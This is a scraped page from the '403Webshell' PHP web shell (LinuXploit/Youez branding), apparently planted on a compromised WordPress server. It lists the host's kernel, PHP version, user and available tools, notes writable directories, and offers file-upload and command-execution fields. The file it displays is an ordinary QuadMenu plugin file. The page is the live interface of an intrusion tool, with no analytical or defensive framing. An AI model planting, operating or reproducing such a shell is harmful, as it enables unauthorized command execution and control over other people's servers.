403Webshell
Server IP : _  /  Your IP : 169.254.129.1
Web Server : nginx/1.28.0
System : Linux 89e302d72aa1 6.6.143.1-1.azl3 #1 SMP PREEMPT_DYNAMIC Mon Jul 6 04:01:14 UTC 2026 x86_64
User : nginx ( 103)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wordpress/wp-content/plugins/quadmenu/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/wordpress/wp-content/plugins/quadmenu/includes/icons.php
<?php

if (!defined('ABSPATH')) {
  die('-1');
}

class QuadMenu_Icons extends QuadMenu_Redux {

  public $args = array();
  public $sections = array();
  public $theme;
  public $ReduxFramework;

  public function __construct() {

    add_action('redux/options/' . QUADMENU_DB_OPTIONS . '/settings/change', array($this, 'icons'), 10, 2);
  }

  static function icons($options = false, $changed = false) {

    //if settings change, take new values from redux update
    if (empty($changed['styles_icons']))
      return;

    QuadMenu_Redux::do_reload(true);

    QuadMenu_Redux::add_notification('blue', sprintf(esc_html__('Theme icons have been changed. Your options panel will be reloaded. %s.', 'quadmenu'), esc_html__('Please wait', 'quadmenu')));
  }

}

new QuadMenu_Icons();

Youez - 2016 - github.com/yon3zu
LinuXploit